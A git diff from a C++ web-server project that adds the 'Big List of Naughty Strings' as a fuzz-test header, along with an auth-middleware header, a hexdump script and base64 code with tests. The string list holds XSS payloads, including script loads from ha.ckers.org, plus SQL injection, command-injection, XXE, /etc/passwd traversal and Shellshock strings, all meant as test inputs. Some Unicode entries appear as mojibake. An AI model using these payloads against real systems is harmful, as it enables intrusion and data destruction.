ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", +"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", +"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", +"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", +"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", +"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", +"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", + +// Script Injection +// +// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + +"<script>alert(123)</script>", +"<script>alert('123');</script>", +"<img src=x onerror=alert(123) />", +"<svg><script>123<1>alert(123)</script>", +"\"><script>alert(123)</script>", +"'><script>alert(123)</script>", +"><script>alert(123)</script>", +"</script><script>alert(123)</script>", +"< / script >< script >alert(123)< / script >", +" onfocus=JaVaSCript:alert(123) autofocus", +"\" onfocus=JaVaSCript:alert(123) autofocus", +"' onfocus=JaVaSCript:alert(123) autofocus", +"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", +"<sc<script>ript>alert(123)</sc</script>ript>", +"--><script>alert(123)</script>", +"\";alert(123);t=\"", +"';alert(123);t='", +"JavaSCript:alert(123)", +";alert(123);", +"src=JaVaSCript:prompt(132)", +"\"><script>alert(123);</script x=\"", +"'><script>alert(123);</script x='", +"><script>alert(123);</script x=", +"\" autofocus onkeyup=\"javascript:alert(123)", +"' autofocus onkeyup='javascript:alert(123)", +"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", +"'`\"><\\x3Cscript>javascript:alert(1)</script>", +"'`\"><\\x00script>javascript:alert(1)</script>", +"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", +"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", +"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", +"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", +"\"`'><script>\\x3Bjavascript:alert(1)</script>", +"\"`'><script>\\x0Djavascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", +"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", +"\"`'><script>\\x09javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", +"\"`'><script>\\x00javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", +"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", +"\"`'><script>\\x0Cjavascript:alert(1)</script>", +"\"`'><script>\\x2Bjavascript:alert(1)</script>", +"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", +"\"`'><script>-javascript:alert(1)</script>", +"\"`'><script>\\x0Ajavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", +"\"`'><script>\\x7Ejavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", +"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", +"\"`'><script>\\x21javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", +"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", +"\"`'><script>\\x0Bjavascript:alert(1)</script>", +"\"`'><script>\\x20javascript:alert(1)</script>", +"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", +"<img \\x00src=x onerror=\"alert(1)\">", +"<img \\x47src=x onerror=\"javascript:alert(1)\">", +"<img \\x11src=x onerror=\"javascript:alert(1)\">", +"<img \\x12src=x onerror=\"javascript:alert(1)\">", +"<img\\x47src=x onerror=\"javascript:alert(1)\">", +"<img\\x10src=x onerror=\"javascript:alert(1)\">", +"<img\\x13src=x onerror=\"javascript:alert(1)\">", +"<img\\x32src=x onerror=\"javascript:alert(1)\">", +"<img\\x47src=x onerror=\"javascript:alert(1)\">", +"<img\\x11src=x onerror=\"javascript:alert(1)\">", +"<img \\x47src=x onerror=\"javascript:alert(1)\">", +"<img \\x34src=x onerror=\"javascript:alert(1)\">", +"<img \\x39src=x onerror=\"javascript:alert(1)\">", +"<img \\x00src=x onerror=\"javascript:alert(1)\">", +"<img src\\x09=x onerror=\"javascript:alert(1)\">", +"<img src\\x10=x onerror=\"javascript:alert(1)\">", +"<img src\\x13=x onerror=\"javascript:alert(1)\">", +"<img src\\x32=x onerror=\"javascript:alert(1)\">", +"<img src\\x12=x onerror=\"javascript:alert(1)\">", +"<img src\\x11=x onerror=\"javascript:alert(1)\">", +"<img src\\x00=x onerror=\"javascript:alert(1)\">", +"<img src\\x47=x onerror=\"javascript:alert(1)\">", +"<img src=x\\x09onerror=\"javascript:alert(1)\">", +"<img src=x\\x10onerror=\"javascript:alert(1)\">", +"<img src=x\\x11onerror=\"javascript:alert(1)\">", +"<img src=x\\x12onerror=\"javascript:alert(1)\">", +"<img src=x\\x13onerror=\"javascript:alert(1)\">", +"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", +"<img src=x onerror=\\x09\"javascript:alert(1)\">", +"<img src=x onerror=\\x10\"javascript:alert(1)\">", +"<img src=x onerror=\\x11\"javascript:alert(1)\">", +"<img src=x onerror=\\x12\"javascript:alert(1)\">", +"<img src=x onerror=\\x32\"javascript:alert(1)\">", +"<img src=x onerror=\\x00\"javascript:alert(1)\">", +"<a href=javascript:javascript:alert(1)>XXX</a>", +"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", +"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", +"<title onpropertychange=javascript:alert(1)></title><title title=>", +"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", +"<!--[if]><script>javascript:alert(1)</script -->", +"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", +"<script src=\"/\%(jscript)s\"></script>", +"<script src=\"\\%(jscript)s\"></script>", +"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", +"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", +"<IMG SRC=# onmouseover=\"alert('xxs')\">", +"<IMG SRC= onmouseover=\"alert('xxs')\">", +"<IMG onmouseover=\"alert('xxs')\">", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=\"jav ascript:alert('XSS');\">", +"<IMG SRC=\"jav	ascript:alert('XSS');\">", +"<IMG SRC=\"jav
ascript:alert('XSS');\">", +"<IMG SRC=\"jav
ascript:alert('XSS');\">", +"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", +"<IMG SRC=\"  javascript:alert('XSS');\">", +"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", +"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", +"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", +"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", +"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", +"<SCRIPT SRC=//ha.ckers.org/.j>", +"<IMG SRC=\"javascript:alert('XSS')\"", +"<iframe src=http://ha.ckers.org/scriptlet.html <", +"\\\";alert('XSS');//", +"<u oncopy=alert()> Copy me</u>", +"<i onwheel=alert(1)> Scroll over me </i>", +"<plaintext>", +"http://a/%%30%30", +"</textarea><script>alert(123)</script>", + +// SQL Injection +// +// Strings which can cause a SQL injection if inputs are not sanitized + +"1;DROP TABLE users", +"1'; DROP TABLE users-- 1", +"' OR 1=1 -- 1", +"' OR '1'='1", +" ", +"%", +"_", + +// Server Code Injection +// +// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +"-", +"--", +"--version", +"--help", +"$USER", +"/dev/null; touch /tmp/blns.fail ; echo", +"`touch /tmp/blns.fail`", +"$(touch /tmp/blns.fail)", +"@{[system \"touch /tmp/blns.fail\"]}", + +// Command Injection (Ruby) +// +// Strings which can call system commands within Ruby/Rails applications + +"eval(\"puts 'hello world'\")", +"System(\"ls -al /\")", +"`ls -al /`", +"Kernel.exec(\"ls -al /\")", +"Kernel.exit(1)", +"%x('ls -al /')", + +// XXE Injection (XML) +// +// String which can reveal system files when parsed by a badly configured XML parser + +"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", + +// Unwanted Interpolation +// +// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + +"$HOME", +"$ENV{'HOME'}", +"%d", +"%s", +"{0}", +"%*.*s", +"File:///", + +// File Inclusion +// +// Strings which can cause user to pull in files that should not be a part of a web server + +"../../../../../../../../../../../etc/passwd%00", +"../../../../../../../../../../../etc/hosts", + +// Known CVEs and Vulnerabilities +// +// Strings that test for known vulnerabilities + +"() { 0; }; touch /tmp/blns.shellshock1.fail;", +"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", +"<<< %s(un='%s') = %u", +"+++ATH0", + +// MSDOS/Windows Special Filenames +// +// Strings which are reserved characters in MSDOS/Windows + +"CON", +"PRN", +"AUX", +"CLOCK$", +"NUL", +"A:", +"ZZ:", +"COM1", +"LPT1", +"LPT2", +"LPT3", +"COM2", +"COM3", +"COM4", + +// IRC specific strings +// +// Strings that may occur on IRC clients that make security products freak out + +"DCC SEND STARTKEYLOGGER 0 0 0", + +// Scunthorpe Problem +// +// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +"Scunthorpe General Hospital", +"Penistone Community Church", +"Lightwater Country Park", +"Jimmy Clitheroe", +"Horniman Museum", +"shitake mushrooms", +"RomansInSussex.co.uk", +"http://www.cum.qc.ca/", +"Craig Cockburn, Software Specialist", +"Linda Callahan", +"Dr. Herman I. Libshitz", +"magna cum laude", +"Super Bowl XXX", +"medieval erection of parapets", +"evaluate", +"mocha", +"expression", +"Arsenal canal", +"classic", +"Tyson Gay", +"Dick Van Dyke", +"basement", + +// Human injection +// +// Strings which may cause human to reinterpret worldview + +"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", + +// Terminal escape codes +// +// Strings which punish the fools who use cat/type on this file + +"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", +"But now...[20Cfor my greatest trick...[8m", +"The quick brown fox... [Beeeep]", + +// iOS Vulnerabilities +// +// Strings which crashed iMessage in various versions of iOS + +"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", +"゚マᄈ0゚フネᄌマ" +};
\ No newline at end of file diff --git a/include/token_authorization_middleware.hpp b/include/token_authorization_middleware.hpp new file mode 100644 index 0000000000..801c75f91b --- /dev/null +++ b/include/token_authorization_middleware.hpp @@ -0,0 +1,23 @@ +#pragma once + +#include <crow/http_request.h> +#include <crow/http_response.h> + +namespace crow +{ + struct TokenAuthorizationMiddleware { + + struct context { + std::unordered_map<std::string, std::string> cookie_sessions; + std::unordered_map<std::string, std::string> cookies_to_push_to_client; + + std::string get_cookie(const std::string& key); + + void set_cookie(const std::string& key, const std::string& value); + }; + + void before_handle(crow::request& req, response& res, context& ctx); + + void after_handle(request& req, response& res, context& ctx); + }; +}
\ No newline at end of file diff --git a/scripts/file_to_string_array.py b/scripts/file_to_string_array.py new file mode 100644 index 0000000000..b81e854901 --- /dev/null +++ b/scripts/file_to_string_array.py @@ -0,0 +1,29 @@ +# -*- coding: utf-8 -*- +import os.path +import string +import sys + + +def print_buf(counter, buf): + buf2 = [('%02x' % ord(i)) for i in buf] + print '{0}: {1:<39} {2}'.format(('%07x' % (counter * 16)), + ' '.join([''.join(buf2[i:i + 2]) for i in range(0, len(buf2), 2)]), + ''.join([c if c in string.printable[:-5] else '.' for c in buf])) + + +def process_xxd(file_path): + with open(file_path, 'r') as f: + counter = 0 + while True: + buf = f.read(16) + if not buf: + break + print_buf(counter, buf) + counter += 1 + + +if __name__ == '__main__': + if not os.path.exists(sys.argv[1]): + print >> (sys.stderr, "The file doesn't exist.") + sys.exit(1) + process_xxd(sys.argv[1])
\ No newline at end of file diff --git a/src/base64.cpp b/src/base64.cpp new file mode 100644 index 0000000000..259288757b --- /dev/null +++ b/src/base64.cpp @@ -0,0 +1,138 @@ +#include <base64.hpp> +#include <cassert> + +namespace base64 +{ +bool base64_encode(const gsl::cstring_span<> &input, std::string &output) +{ + static const char encoding_data[] = + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + + unsigned int input_length = input.size(); + + // allocate space for output string + output.clear(); + output.reserve(((input_length + 2) / 3) * 4); + + // for each 3-bytes sequence from the input, extract 4 6-bits sequences and + // encode using + // encoding_data lookup table. + // if input do not contains enough chars to complete 3-byte sequence,use pad + // char '=' + for (unsigned int i = 0; i < input_length; i++) { + int base64code0 = 0; + int base64code1 = 0; + int base64code2 = 0; + int base64code3 = 0; + + base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits + output += encoding_data[base64code0]; + base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits + + + if (++i < input_length) { + base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits + output += encoding_data[base64code1]; + base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits + + + if (++i < input_length) { + base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits + base64code3 = input[i] & 0x3f; // 3-byte 6 bits + output += encoding_data[base64code2]; + output += encoding_data[base64code3]; + } else { + output += encoding_data[base64code2]; + output += '='; + } + } else { + output += encoding_data[base64code1]; + output += '='; + output += '='; + } + } + + return true; +} + + +bool base64_decode(const gsl::cstring_span<> &input, std::string &output) +{ + static const char nop = -1; + static const char decoding_data[] = { + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 62, nop, + nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, nop, nop, + nop, nop, nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, + 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, + 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33, + 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop}; + + unsigned int input_length = input.size(); + + // allocate space for output string + output.clear(); + output.reserve(((input_length + 2) / 3) * 4); + + // for each 4-bytes sequence from the input, extract 4 6-bits sequences by + // droping first two bits + // and regenerate into 3 8-bits sequence + + for (unsigned int i = 0; i < input_length; i++) { + char base64code0; + char base64code1; + char base64code2 = 0; // initialized to 0 to suppress warnings + char base64code3; + + base64code0 = decoding_data[static_cast<int>(input[i])]; + if (base64code0 == nop) // non base64 character + return false; + if (!(++i < input_length)) // we need at least two input bytes for first + // byte output + return false; + base64code1 = decoding_data[static_cast<int>(input[i])]; + if (base64code1 == nop) // non base64 character + return false; + + output += ((base64code0 << 2) | ((base64code1 >> 4) & 0x3)); + + if (++i < input_length) { + char c = input[i]; + if (c == '=') { // padding , end of input + assert((base64code1 & 0x0f) == 0); + return true; + } + base64code2 = decoding_data[static_cast<int>(input[i])]; + if (base64code2 == nop) // non base64 character + return false; + + output += ((base64code1 << 4) & 0xf0) | ((base64code2 >> 2) & 0x0f); + } + + if (++i < input_length) { + char c = input[i]; + if (c == '=') { // padding , end of input + assert((base64code2 & 0x03) == 0); + return true; + } + base64code3 = decoding_data[static_cast<int>(input[i])]; + if (base64code3 == nop) // non base64 character + return false; + + output += (((base64code2 << 6) & 0xc0) | base64code3); + } + } + + return true; +} + +}
\ No newline at end of file diff --git a/src/base64_test.cpp b/src/base64_test.cpp new file mode 100644 index 0000000000..3484976034 --- /dev/null +++ b/src/base64_test.cpp @@ -0,0 +1,62 @@ +#include "base64.hpp" +#include "gtest/gtest.h" +#include "big_list_of_naughty_strings.hpp" + +// Tests that Base64 basic strings work +TEST(Base64, EncodeBasicString) +{ + std::string output; + EXPECT_TRUE(base64::base64_encode("Foo", output)); +} + +// Tests the test vectors available in the base64 spec +TEST(Base64, EncodeRFC4648) +{ + std::string output; + EXPECT_TRUE(base64::base64_encode("", output)); + EXPECT_EQ(output, ""); + EXPECT_TRUE(base64::base64_encode("f", output)); + EXPECT_EQ(output, "Zg=="); + EXPECT_TRUE(base64::base64_encode("fo", output)); + EXPECT_EQ(output, "Zm8="); + EXPECT_TRUE(base64::base64_encode("foo", output)); + EXPECT_EQ(output, "Zm9v"); + EXPECT_TRUE(base64::base64_encode("foob", output)); + EXPECT_EQ(output, "Zm9vYg=="); + EXPECT_TRUE(base64::base64_encode("fooba", output)); + EXPECT_EQ(output, "Zm9vYmE="); + EXPECT_TRUE(base64::base64_encode("foobar", output)); + EXPECT_EQ(output, "Zm9vYmFy"); +} + +// Tests the test vectors available in the base64 spec +TEST(Base64, DecodeRFC4648) +{ + std::string output; + EXPECT_TRUE(base64::base64_decode("", output)); + EXPECT_EQ(output, ""); + EXPECT_TRUE(base64::base64_decode("Zg==", output)); + EXPECT_EQ(output, "f"); + 